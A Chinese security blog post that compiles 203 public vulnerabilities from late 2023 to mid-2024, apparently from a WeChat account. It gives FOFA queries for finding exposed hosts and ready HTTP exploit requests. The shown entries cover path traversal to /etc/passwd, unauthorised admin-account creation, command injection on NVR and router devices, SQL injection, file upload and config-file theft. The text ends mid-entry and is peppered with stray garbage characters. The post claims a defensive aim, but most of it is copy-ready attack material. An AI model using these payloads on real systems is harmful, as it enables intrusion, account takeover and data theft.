互联网公开漏洞整理202309-2024062 J' A$ k x. t9 k& i' K0 J
道一安全 2024-06-05 07:41 北京2 x2 I1 M; E0 U; \: ~5 B; `
以下文章来源于网络安全新视界 ,作者网络安全新视界4 y6 M* u- Q3 V3 ^9 [9 G( q- s
: t9 ?# E0 b5 m$ W4 L发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。5 x( v$ [4 j2 [, I) \" [- q
6 S' M. Q( z3 ]8 A& Z% S# w: b/ O; z漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。- ~6 m( I% f8 A
7 ^* L5 v$ J! n9 P, y5 j. w M
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。' S* A/ \1 m; R3 s0 o
: @, z3 o/ ~" m! o# T) Y
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
0 R8 A9 C Y' d6 f
' O% E$ Y& D& F' X4 A合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
/ \" u* g( P! B$ R+ Y- `$ l; Q* N! U9 m
5 m0 `( M; r- W$ u5 l! Z' @
声明" Z1 Z3 g2 t0 a- C! z
: j' e1 y, p* _8 w2 H+ {为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。1 ~& ~: @2 H2 ?
2 v/ G" b" r. ]: f6 z! H
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
; `0 v1 X. s2 Q' |3 y3 a( L3 J* V+ v4 V( G w( w
- z0 E; L( s' [ D3 g
7 S5 P2 D8 f% F# N# Z目录 D1 f+ t( l! ?: [" {' v4 Q% T
+ ?4 ?; B6 |& t* `/ h01
) Z4 r, u- `& @9 P5 _1 M8 m( ~4 F
1. StarRocks MPP数据库未授权访问 w4 j a( V2 A! A6 l$ ?, C- k
2. Casdoor系统static任意文件读取3 L( x4 ?+ a! Z( ]' H$ e
3. EasyCVR智能边缘网关 userlist 信息泄漏) G& C5 s* M; ]5 H
4. EasyCVR视频管理平台存在任意用户添加
' Z3 c# w6 Z; E; W# |9 K5. NUUO NVR 视频存储管理设备远程命令执行
& `) N, T4 ^; h6. 深信服 NGAF 任意文件读取
- ]3 M7 [( {0 L( M! S6 z7. 鸿运主动安全监控云平台任意文件下载
5 @. m( T. }1 X8. 斐讯 Phicomm 路由器RCE
4 `; R; J) p I9. 稻壳CMS keyword 未授权SQL注入- O: t0 u; L4 O% u
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传: q- E1 S q4 d, x! \: k9 k6 l: c, t6 q
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入% S$ r' }8 ?3 M: K# d Q( @- }/ S
12. Jorani < 1.0.2 远程命令执行0 g3 F% z' K8 m1 r0 e9 I
13. 红帆iOffice ioFileDown任意文件读取; P5 _/ j5 b/ i" E
14. 华夏ERP(jshERP)敏感信息泄露" L! {1 P) O5 Y
15. 华夏ERP getAllList信息泄露. A7 |- h. d/ Y2 n1 ?
16. 红帆HFOffice医微云SQL注入
% L4 [% y7 ?0 k2 r: {17. 大华 DSS itcBulletin SQL 注入
; d `- ^( ^) n$ |! {18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
1 T8 M% i/ A m# B19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入7 c C( [* e+ ]5 @) h# I1 z
20. 大华ICC智能物联综合管理平台任意文件读取- v8 `) j; i" ]( D# o6 ]
21. 大华ICC智能物联综合管理平台random远程代码执行: T- }* U# ?8 ~& p6 {
22. 大华ICC智能物联综合管理平台 log4j远程代码执行" g/ w9 P2 y2 W
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行. u4 ?& j) n( x, B' e4 }& v
24. 用友NC 6.5 accept.jsp任意文件上传* a/ R' H2 |; X' a* I" X: U
25. 用友NC registerServlet JNDI 远程代码执行
) d" K: }* [* I( H26. 用友NC linkVoucher SQL注入7 S: e& `' w9 n8 \ }1 R
27. 用友 NC showcontent SQL注入
+ m' r8 Q8 ^& D28. 用友NC grouptemplet 任意文件上传& o; [# L1 A# @# f, R1 F+ m
29. 用友NC down/bill SQL注入
u7 y4 E/ f, r$ D7 }30. 用友NC importPml SQL注入
" X( H% l0 s" n. n2 O3 H& ?, T( t- r31. 用友NC runStateServlet SQL注入
7 H7 l1 |* S* l7 d32. 用友NC complainbilldetail SQL注入, C0 m0 M: a* l' B v H
33. 用友NC downTax/download SQL注入
* R- c7 K$ I; C0 q O* U, O; ~34. 用友NC warningDetailInfo接口SQL注入" e: D- D5 s) W: O% w& R* ?
35. 用友NC-Cloud importhttpscer任意文件上传& z/ E0 H9 V A& }
36. 用友NC-Cloud soapFormat XXE
# I3 a+ J% P* _& X$ l8 n2 d37. 用友NC-Cloud IUpdateService XXE* [' b( C' b9 n
38. 用友U8 Cloud smartweb2.RPC.d XXE
4 e2 I8 K8 E6 K8 E) y39. 用友U8 Cloud RegisterServlet SQL注入+ `. I: X" o. U
40. 用友U8-Cloud XChangeServlet XXE
5 N& d9 u1 i% A1 [( e2 i, ~41. 用友U8 Cloud MeasureQueryByToolAction SQL注入5 L+ r3 R- Z, n) z9 C: E4 c6 h$ e
42. 用友GRP-U8 SmartUpload01 文件上传& ?8 r8 D- N, C, E
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
: I, m$ J3 x; C8 ^6 \4 u0 ]44. 用友GRP-U8 bx_dj_check.jsp SQL注入
J, s& }0 D- H- r45. 用友GRP-U8 ufgovbank XXE; ^, B$ q) h- { b
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
, s8 B" u( m* ]( h47. 用友GRP A++Cloud 政府财务云 任意文件读取
* }0 L5 G. V; Y# i. q: X48. 用友U8 CRM swfupload 任意文件上传# O: V% X4 \8 M, e5 q, S6 F
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
4 D6 e8 b$ S1 T7 q0 c50. QDocs Smart School 6.4.1 filterRecords SQL注入
5 i# o! n! L; _51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
, u9 G7 P7 _) z$ A) C8 B9 E52. 泛微E-Office json_common.php sql注入
/ ]% x2 }% b- @8 o( d, Y% g* E53. 迪普 DPTech VPN Service 任意文件上传
( `) Y, n; H5 h! e54. 畅捷通T+ getstorewarehousebystore 远程代码执行, z3 B; g' H0 P
55. 畅捷通T+ getdecallusers信息泄露4 B. q1 q' A& _* ` {7 z* G' f: S
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE8 ~" |( n' c# L3 ]
57. 畅捷通T+ keyEdit.aspx SQL注入
! k) A. r* y2 W7 N- }% |% _; z58. 畅捷通T+ KeyInfoList.aspx sql注入& s1 B' M0 f( @7 k/ A6 T
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
1 u& l* z4 z, o5 e; z0 \0 [60. 百卓Smart管理平台 importexport.php SQL注入
+ R/ z2 Q' q4 ]5 X/ R1 H+ Z61. 浙大恩特客户资源管理系统 fileupload 任意文件上传 q' d5 e5 l( |1 {" w# }
62. IP-guard WebServer 远程命令执行
) i1 b( x& t( O$ p63. IP-guard WebServer任意文件读取
, J7 Q* G& p) u0 A' b! D- j64. 捷诚管理信息系统CWSFinanceCommon SQL注入
+ M4 u9 b( l: ^) h) ^65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
7 o7 Q4 S/ r" S8 X( [66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
* X; n- f7 K* @3 |" w67. 万户ezOFFICE wpsservlet任意文件上传
5 k! p1 N7 C- A1 S68. 万户ezOFFICE wf_printnum.jsp SQL注入6 L* f4 c4 M# m: _5 u
69. 万户 ezOFFICE contract_gd.jsp SQL注入" X' }" M x) I: `
70. 万户ezEIP success 命令执行 F, \; @, ?0 y/ A) H z2 l6 o" u
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入. }7 a2 m5 d( s& \+ B' E: N
72. 致远OA getAjaxDataServlet XXE
4 V9 `: k( Y, d73. GeoServer wms远程代码执行
7 h% h. C m6 A' d! u$ A6 A2 f2 H74. 致远M3-server 6_1sp1 反序列化RCE, ]- u; O. W& U8 a& D: v
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE) o2 j L7 j* j/ J- s' O9 R5 Z
76. 新开普掌上校园服务管理平台service.action远程命令执行
# H2 J9 Q9 P8 l3 k77. F22服装管理软件系统UploadHandler.ashx任意文件上传
# O+ R& ?4 H% ?: F9 i n1 Q78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传; [" V1 R; ^5 _6 l( ]
79. BYTEVALUE 百为流控路由器远程命令执行, U0 R' p' s' i; D+ N
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
1 `& R- ~; d# M, l" c* i; L' ?1 X5 Q81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露1 k% c4 @5 `# t3 Z0 B7 ^
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
7 }; s6 n1 }6 [7 b: H9 U83. JeecgBoot testConnection 远程命令执行4 I" R6 o0 ?8 H$ u$ x
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入! B+ M8 A8 |! n2 R. k; P) _) u
85. SysAid On-premise< 23.3.36远程代码执行
. |& v/ W6 g2 I/ I# ]86. 日本tosei自助洗衣机RCE: z# N0 ~7 P! I( G& g- t Z
87. 安恒明御安全网关aaa_local_web_preview文件上传
! Q: ] }2 ~* h- }" S7 o88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
u, Z1 E9 H" P( v89. 致远互联FE协作办公平台editflow_manager存在sql注入
i, A1 k7 s$ ~# Z* a* g* h. Z90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
. G6 V) r% `/ S8 K7 L91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
2 Y3 Y4 O; t5 ~% |6 d92. 海康威视运行管理中心session命令执行
( |2 Y& [9 v- k5 D: f+ i& E93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传( [' \& d6 F, M. |- o& `2 i- t
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
5 e, b( C! V1 y' I: f95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行% C& n7 y _ [2 }' E ]% |
96. Apache OFBiz 18.12.11 groovy 远程代码执行
; s: L% U, \' m; v. o97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行% X$ L6 H: W q1 I# M/ N
98. SpiderFlow爬虫平台远程命令执行- O2 M3 C u( H2 I# z1 E* P8 |
99. Ncast盈可视高清智能录播系统busiFacade RCE
' @6 x( r: a7 `: M3 z100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
7 P3 s: t! _' w, S101. ivanti policy secure-22.6命令注入. V4 A1 _/ T& F# g* B% Q( Z
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
. G. M2 q3 g1 y w h- D/ q; S103. Ivanti Pulse Connect Secure VPN XXE
' x/ E% k0 u0 |# j& m104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
* \5 v/ b; T7 _8 p+ M' o105. SpringBlade v3.2.0 export-user SQL 注入# m9 E3 j% l: w( {- U
106. SpringBlade dict-biz/list SQL 注入+ l$ g* N* K X7 z
107. SpringBlade tenant/list SQL 注入
, \. J* N6 E0 P" q- j; c108. D-Tale 3.9.0 SSRF8 S4 H% Z9 x& ^) ^% N
109. Jenkins CLI 任意文件读取7 }1 C& F( _2 m+ }7 |: q- [
110. Goanywhere MFT 未授权创建管理员6 c2 s: e }; u1 _, t' g
111. WordPress Plugin HTML5 Video Player SQL注入
) G, a, T$ I: Z, S0 r7 v112. WordPress Plugin NotificationX SQL 注入
' E: R# m! o9 L; T/ h. R; q" e113. WordPress Automatic 插件任意文件下载和SSRF
0 E: O$ q( b2 X. m( E2 M/ m114. WordPress MasterStudy LMS插件 SQL注入
8 V$ ^& ~! b: ^; c6 f0 f9 Z115. WordPress Bricks Builder <= 1.9.6 RCE
0 a' R1 J$ i6 x# @116. wordpress js-support-ticket文件上传% \4 Q4 A, F, Z% b( k8 |4 m
117. WordPress LayerSlider插件SQL注入
% o( J6 r! ]4 @ {118. 北京百绰智能S210管理平台uploadfile.php任意文件上传7 }! P" C( d. i
119. 北京百绰智能S20后台sysmanageajax.php sql注入
1 p" m* u. e8 w3 H& X# B3 T120. 北京百绰智能S40管理平台导入web.php任意文件上传1 w) t3 t# d9 r9 e' y% u- S- ~% s/ u
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
( D( r( S8 ]5 q# ]+ [) \, b0 S122. 北京百绰智能s200管理平台/importexport.php sql注入
+ @* P$ M+ f% \: |( j5 g' E123. Atlassian Confluence 模板注入代码执行 G0 `* C6 d* \4 Q+ A
124. 湖南建研工程质量检测系统任意文件上传- [; ~) x- k+ R/ o
125. ConnectWise ScreenConnect身份验证绕过
: I0 t& e, v% c, g) b( Q- |; X126. Aiohttp 路径遍历. p3 x5 P1 D4 j1 A
127. 广联达Linkworks DataExchange.ashx XXE, o; g" j7 g) p( E( X/ T& \6 a
128. Adobe ColdFusion 反序列化
2 p! W+ B* ^& R129. Adobe ColdFusion 任意文件读取
1 p Z3 k6 L# P6 o3 s2 o- n$ }130. Laykefu客服系统任意文件上传
. x; F7 {7 C! Q! P1 [131. Mini-Tmall <=20231017 SQL注入
* J; b% @* ^- Y* P132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过. x: B. V2 K9 f* b8 u O: ?( t0 \
133. H5 云商城 file.php 文件上传
2 r( }0 v" J4 _134. 网康NS-ASG应用安全网关index.php sql注入
% ^( Q! t4 T: k2 I* K1 J \135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
- u1 p) i; d! w4 K8 R: Z8 |136. NextChat cors SSRF' u2 j8 ]# {* O1 L
137. 福建科立迅通信指挥调度平台down_file.php sql注入
/ c) f* z0 v# {138. 福建科立讯通信指挥调度平台pwd_update.php sql注入 k: }5 }: Z6 Q4 @0 m; c7 Z
139. 福建科立讯通信指挥调度平台editemedia.php sql注入+ d! }8 d8 r1 t$ I: O, N; J+ e
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入3 h! Q- i" D2 s. p" O. ?% ~( t, z
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入& d* T! {( F5 g0 J2 _3 Y& C6 w
142. CMSV6车辆监控平台系统中存在弱密码, c* S1 | T$ F
143. Netis WF2780 v2.1.40144 远程命令执行2 T3 q9 t. F+ p/ g
144. D-Link nas_sharing.cgi 命令注入
& M8 q9 @5 @3 l5 g( I145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
6 e1 z8 ?5 l) {7 T) n. \146. MajorDoMo thumb.php 未授权远程代码执行1 E: o% f4 ^! u! M
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历+ q$ X* @9 W% t
148. CrushFTP 认证绕过模板注入
, A$ e" f# [8 Z, j+ i& V" w. k! c149. AJ-Report开源数据大屏存在远程命令执行+ I" B6 f7 g7 v1 s( f
150. AJ-Report 1.4.0 认证绕过与远程代码执行
: d' R6 _8 h C2 a$ Q* O' `6 r151. AJ-Report 1.4.1 pageList sql注入# F* y/ i- u, M" p: |- y
152. Progress Kemp LoadMaster 远程命令执行4 K- |) {9 p8 l5 |$ }
153. gradio任意文件读取
- L8 `3 Z6 y3 e2 [154. 天维尔消防救援作战调度平台 SQL注入
U1 Z2 g# }! o2 a155. 六零导航页 file.php 任意文件上传( c2 R+ f# F) ?
156. TBK DVR-4104/DVR-4216 操作系统命令注入
& I* G( b8 u @5 f; `2 ]" J157. 美特CRM upload.jsp 任意文件上传
3 F+ a( _" K3 x2 s" x158. Mura-CMS-processAsyncObject存在SQL注入7 Q! A8 _3 C$ F: o4 ~* F$ z
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
' [3 V5 L/ b0 ~% m$ F6 M/ C160. Sonatype Nexus Repository 3目录遍历与文件读取
( g- w7 d2 Q, |161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传. b9 z4 s8 j. H% W: U) f
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
- H7 r3 }3 q( j; ^4 ]- [5 I163. 号卡极团分销管理系统 ue_serve.php 任意文件上传! E2 w7 r; d! s! G
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
+ d, J/ n, F- S( {: T165. OrangeHRM 3.3.3 SQL 注入
% D8 V+ ]* B+ E8 B; S166. 中成科信票务管理平台SeatMapHandler SQL注入% Y7 P3 a% _( q' T/ k4 N5 u
167. 精益价值管理系统 DownLoad.aspx任意文件读取
+ v( R" j. v4 X5 E; {168. 宏景EHR OutputCode 任意文件读取
) P9 O5 @2 Z, P/ L) S169. 宏景EHR downlawbase SQL注入9 ?6 ^6 j- g8 q! k1 ]/ H2 m
170. 宏景EHR DisplayExcelCustomReport 任意文件读取8 ~3 [. n% a! M4 m. H; F( m! w5 j
171. 通天星CMSV6车载定位监控平台 SQL注入% K- }4 p/ A- A% Z- W1 X
172. DT-高清车牌识别摄像机任意文件读取* k: D# _; u2 e1 ^" M; O n& d
173. Check Point 安全网关任意文件读取4 G/ ^/ C7 Y, k& N; o6 b
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
! K. A g) Z- ?% J. f; E+ r175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入* ~: ^; u! u3 i6 y# {
176. 电信网关配置管理系统 rewrite.php 文件上传' [9 ?/ S: ?) Q5 M6 Q+ S
177. H3C路由器敏感信息泄露5 y3 D+ H$ N! `# f
178. H3C校园网自助服务系统-flexfileupload-任意文件上传1 i% F/ w) E) t) v' k3 ?
179. 建文工程管理系统存在任意文件读取7 W# h h$ B g6 j) }; c) F |9 v/ a
180. 帮管客 CRM jiliyu SQL注入8 {- C+ s& w3 p: R: o3 _
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
3 m( V2 ]0 p( z8 K1 `' M$ Y! l182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
0 q& Z) p0 L/ |; p183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
8 i; N9 Y4 f7 U" g& x184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
, r- I) e( F9 S4 r185. 瑞友天翼应用虚拟化系统SQL注入+ `, ]% x% W$ T% ]
186. F-logic DataCube3 SQL注入
- w8 P# Q& n) D( b* ]187. Mura CMS processAsyncObject SQL注入7 K4 z2 S4 x; w" i
188. 叁体-佳会视频会议 attachment 任意文件读取
5 N; h: F& I/ A; e8 s" x4 c189. 蓝网科技临床浏览系统 deleteStudy SQL注入* c: Z0 d$ n% e& ` Y
190. 短视频矩阵营销系统 poihuoqu 任意文件读取' v9 r: N$ J1 i4 W. \9 {- S
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
* U0 c! f) Y4 k" o/ }6 v192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
p5 M% i$ @" O1 }0 M193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
& @' V/ j/ U( I9 W9 E1 Y. j, p9 U194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
% b; N. s: m: x/ J c% g195. 飞鱼星上网行为管理系统 send_order.cgi命令执行4 @, _* N* r% j( [5 h9 R
196. 河南省风速科技统一认证平台密码重置
+ D4 _7 E* p7 l197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
. h: m3 e8 F7 \4 E, P9 G$ f" h0 i% b198. 阿里云盘 WebDAV 命令注入2 y; n+ K% E# N9 @! E* }
199. cockpit系统assetsmanager_upload接口 文件上传9 Z# E2 m% s2 Q- t
200. SeaCMS海洋影视管理系统dmku SQL注入
" l& a/ W; {9 g4 l/ k4 ~6 g, b201. 方正全媒体新闻采编系统 binary SQL注入
# _3 |9 @) v- s202. 微擎系统 AccountEdit任意文件上传
" L, @! ]) k c/ D203. 红海云EHR PtFjk 文件上传3 g/ q( C" H7 s5 v i$ W: b: ]
$ r/ w; T9 C( f6 hPOC列表1 ]* I0 \" f, J5 d7 d# ^
/ {$ H" y1 p; F3 R' }4 s02! K/ G$ I# G! ^3 \" F+ B0 }
1 U; i) {- Z) B2 o1. StarRocks MPP数据库未授权访问# h8 |2 E7 o7 p* n4 }5 }; t
FOFA :title="StarRocks"
" ?# Z6 S$ C( v, u( J9 M, mGET /mem_tracker HTTP/1.1
% x7 E- r# E9 L$ a1 K' DHost: URL
7 [$ S! P. p3 v& m! v: |, U, Q/ T; v5 C
' z$ n9 e0 g1 t/ v1 r
2. Casdoor系统static任意文件读取
2 W2 s9 K5 r, b _, mFOFA :title="Casdoor"
2 }( b' T) \; k1 f/ j6 A1 l' f- tGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1$ b6 r, |6 J6 n: j/ j. O' x# P* _# D
Host: xx.xx.xx.xx:99998 u: p: j! ?' {. C, l& |, R6 e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- M# h* i0 R Z5 T% s x, f" H0 L* {8 z
Connection: close
0 N# h! x; d9 Y% S+ b: VAccept: */*% G5 q& K! A: K" _) d
Accept-Language: en
7 O7 B" z( q- Y9 {7 b. YAccept-Encoding: gzip
+ h' ?2 k5 d5 N2 h/ {0 @! `8 c0 ~( E( `0 l
- V5 F0 |, B" W! P$ r+ \7 x5 F: x
3. EasyCVR智能边缘网关 userlist 信息泄漏
! {8 Y* \ u- r* l0 zFOFA :title="EasyCVR"
6 y& q! s" n& Z) D* F. P) AGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
. B/ j6 r* o3 LHost: xx.xx.xx.xx
9 |* [7 C2 f- t5 g6 l9 y- N% }, t3 t- k) B5 l6 q. A! Y3 c6 V- {
) w4 W8 T+ J" X) _3 |
4. EasyCVR视频管理平台存在任意用户添加3 P/ N/ u3 T- C( n! [
FOFA :title="EasyCVR"
J, q; I" K7 O+ G8 U. i& M, S% E* m6 a# c) `1 n/ p E7 y1 D
password更改为自己的密码md5
& [) b) P/ w. M* xPOST /api/v1/adduser HTTP/1.1
( d" Y' _* F' Q% e' m0 tHost: your-ip( R1 @+ p* A# d/ l' v
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
0 Q4 g) E! R; o2 B$ B. @; M0 a- ?4 T3 s8 T% ^% Y- r1 }0 k, Y$ O1 r
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
$ ^) _" m0 {5 K$ V7 o. r
+ v" ~) k' W; ^8 p# A" A4 K
* T- X0 a# t: J Z0 K9 {* J5. NUUO NVR 视频存储管理设备远程命令执行5 @# f6 ^( T/ J1 {8 v& a
FOFA:title="Network Video Recorder Login"5 A8 p, S: b7 \4 B+ i M; E9 ^
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
& z# o1 K# ]; P+ f* W2 E) ^6 }4 dHost: xx.xx.xx.xx
) ~5 q: z: m7 r1 t$ Z+ n& q- W, c4 v* i" F: Y2 W+ t
$ ?7 A) j8 V! _& ?5 n- p6 t* ]
6. 深信服 NGAF 任意文件读取
# f+ j. A7 n9 y, yFOFA:title="SANGFOR | NGAF"
' `1 Q. f6 p, H2 ^6 @5 l6 j( IGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1: ^& A' o4 q- D) R; t$ O$ }
Host: `9 m$ h/ u( I4 s3 F/ e3 ?
( ^! @! r% |. L# }3 U( S
. q W8 }! B# P! q c
7. 鸿运主动安全监控云平台任意文件下载/ x2 `2 _' S5 \
FOFA:body="./open/webApi.html"7 X0 _9 ~5 R. z) i
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1; ~/ z- Z3 x1 [: ]2 s: \
Host:! [, [' _* J I0 L; i- L5 \
' }9 h' v" I0 p+ S
" t) t2 u" F7 ^% E# [6 Y8. 斐讯 Phicomm 路由器RCE
" N% w7 U. [4 Q1 t9 k$ i/ YFOFA:icon_hash="-1344736688"
" S! x, |7 B# ^* D O7 F# n默认账号admin登录后台后,执行操作7 T4 T: I0 t9 O+ M
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.11 g5 \; e3 N& L7 g- J
Host: x.x.x.x
8 i" C. F$ ~7 j3 n, wCookie: sysauth=第一步登录获取的cookie
- \2 x8 m g. M& y& G* d+ jContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz) x) w# g6 a$ i8 b0 Z( K
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36) y# ^, ~6 w# f Q9 S9 k2 d0 p
. i z# X1 k+ b1 x2 I% r m& Q------WebKitFormBoundaryxbgjoytz4 k1 c0 {4 A- B( G
Content-Disposition: form-data; name="wifiRebootEnablestatus"
+ O1 L+ i9 L2 x- ]+ K
7 N" w! Z# Y1 Y2 [+ s8 L%s% o: Y6 K' H) G) }" |9 ]+ |
------WebKitFormBoundaryxbgjoytz
& D' W' Q! x, o( F: EContent-Disposition: form-data; name="wifiRebootrange"* `+ Z% x# Z) k' d& p* V
) J; N5 }' l) v/ h9 Z, g% W! t12:00; id;6 b. \3 M. w0 I1 P/ W) |4 ]8 k) @
------WebKitFormBoundaryxbgjoytz
) E; A2 f6 @! d* o- \: X U( lContent-Disposition: form-data; name="wifiRebootendrange") T8 t* ^" J* n
$ U2 u: l0 |% E" A S: n%s:
: ~- U3 l* F7 W( Y& t------WebKitFormBoundaryxbgjoytz6 b! M$ A4 b) i3 O7 o0 r9 `. o" X
Content-Disposition: form-data; name="cururl2"
* g( U! H3 Z; o6 `$ R. k4 D% O% z6 y) w# V
) N0 i. N1 O/ P5 D------WebKitFormBoundaryxbgjoytz--
) G+ C6 M% ? ~, A
5 }, b u% ]+ P/ E3 E1 k! q. d1 \5 ] U
9. 稻壳CMS keyword 未授权SQL注入' ]6 Z% N' K w& A$ _
FOFA:app="Doccms"
' \* x8 i6 d% KGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1 a/ e( R! O8 T( | Q
Host: x.x.x.x4 z) k. [5 i# v
" c; E' e* s7 b$ e8 v" }
% B+ m7 _: I' k3 c$ |
payload为下列语句的二次Url编码
: c: B* w( M% M- l9 g" M6 A+ c/ S$ S3 x T2 c! h
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#2 d1 z! y: f, f
# R) G1 t S1 b9 H/ W% A1 g6 H
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传* t- R- _. ] j7 V! g# v: y- V
FOFA:icon_hash="953405444"+ E3 J& T h9 a' B9 x8 |0 W
! n$ q) r6 o" F; T% Y
文件上传后响应中包含上传文件的路径/ j* g0 V( O0 q- p
POST /eis/service/api.aspx?action=saveImg HTTP/1.1- V; P1 E' F8 Z0 v5 r
Host: x.x.x.x:xx
. _% `3 S f6 q1 g# BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
. P; r" @3 @5 g2 t! Q- jContent-Length: 1979 p) h( B7 r T5 ~( o8 h, L) V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.94 p/ }9 P p1 X Y9 O9 ]1 ^" Y
Accept-Encoding: gzip, deflate
# v( g% K- L- y4 c8 y' C, n1 KAccept-Language: zh-CN,zh;q=0.9/ }; V; ?9 j- B$ c; p
Connection: close
+ L, I2 W$ a! Y! xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
O$ I* w: u- g4 R0 H+ f/ \4 U- L+ O7 ~
------WebKitFormBoundaryxdgaqmqu, v6 u: u4 E+ {3 m# K+ ~% D: @) Z
Content-Disposition: form-data; name="file"filename="icfitnya.txt"2 \% L1 k* T- w% G9 Q/ u& ?2 F# P
Content-Type: text/html9 m6 ]- R6 j" }3 P* j
3 T2 f" H K! m# U$ `jmnqjfdsupxgfidopeixbgsxbf% M# Y3 X0 N# b- }; P! {; t
------WebKitFormBoundaryxdgaqmqu--
+ O3 k/ c3 U( b" l8 D+ {' t" t0 W. ?3 N* Z9 T ?% W+ p5 ^* P
A( v5 ?% C; g+ l2 N
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
# _+ t5 }9 [# H aFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
6 |. [0 }$ m8 O: GGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1, N8 k& C H9 z5 O7 G( F
